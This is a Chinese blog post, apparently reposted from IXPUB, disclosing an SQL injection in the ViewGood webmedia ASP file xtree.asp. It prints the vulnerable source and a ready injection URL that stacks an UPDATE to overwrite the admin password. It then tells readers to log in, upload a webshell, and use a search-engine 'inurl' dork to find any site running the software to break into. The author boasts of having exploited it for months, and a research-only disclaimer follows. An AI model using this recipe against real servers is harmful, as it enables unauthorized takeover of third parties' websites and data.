来源:IXPUB
四月份发现的,现在仍出来。
玩了有段时间了 嘎嘎。。。。
漏洞文件webmedia/common/function/xtree.asp
<!--#include file="../dbcon.inc.asp" --> <% iNode_ID = Request.QueryString("id") if Len(Session("SuperAdmin")) > 0 or Len(Session("LIVEAdmin")) > 0 or Len(Session("VODAdmin")) > 0 then szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>=20 AND ParentID=" & iNode_ID else szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>20 AND ParentID=" & iNode_ID end if rsData.Open szSQL,con,1,3 szRetVar = "<?xml version='1.0' encoding='GB2312'?><Root>" do while not rsData.EOF szRetVar = szRetVar & "<TypeInfo>" szRetVar = szRetVar & "<IDN>" & rsData("Type_ID") & "</IDN>" szRetVar = szRetVar & "<ParentID>" & rsData("ParentID") & "</ParentID>" szRetVar = szRetVar & "<TypeName>" & Replace(rsData("TypeName"), "&", "&") & "</TypeName>" szRetVar = szRetVar & "</TypeInfo>" rsData.MoveNext loop szRetVar = szRetVar & "</Root>" rsData.Close Response.CharSet = "GB2312" Response.C Response.Expires = -1 Response.Write szRetVar %> 〈!--#include file="../dbend.inc.asp" --> 〈!--#include file="../dbcon.inc.asp" --> 〈% iNode_ID = Request.QueryString("id") if Len(Session("SuperAdmin")) > 0 or Len(Session("LIVEAdmin")) > 0 or Len(Session("VODAdmin")) > 0 then szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>=20 AND ParentID=" & iNode_ID else szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>20 AND ParentID=" & iNode_ID end if rsData.Open szSQL,con,1,3 szRetVar = "<?xml version='1.0' encoding='GB2312'?><Root>" do while not rsData.EOF szRetVar = szRetVar & "<TypeInfo>" szRetVar = szRetVar & "<IDN>" & rsData("Type_ID") & "</IDN>" szRetVar = szRetVar & "<ParentID>" & rsData("ParentID") & "</ParentID>" szRetVar = szRetVar & "<TypeName>" & Replace(rsData("TypeName"), "&", "&") & "</TypeName>" szRetVar = szRetVar & "</TypeInfo>" rsData.MoveNext loop szRetVar = szRetVar & "</Root>" rsData.Close Response.CharSet = "GB2312" Response.C Response.Expires = -1 Response.Write szRetVar %> <!--#include file="../dbend.inc.asp" -->
很容易看出以上存在着DB权限注入
注射地址http://WWWW.XXXXX.COM/webmedia/common/function/xtree.asp?id=1
表段名:customer
构造函数 把admin的pass改成fuck
http://WWWW.XXXXX.COM/webmedia/common/function/xtree.asp?id=1;update%20customer%20set%20UserPass=’633f94d350db34d5’%20where%20UserName=’admin’
登陆后台 直接上传大马 完事!
测试方法:在google baidu搜: inurL:webmedia/ 随便找个站都可以入侵
官方地址http://www.viewgood.com/
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论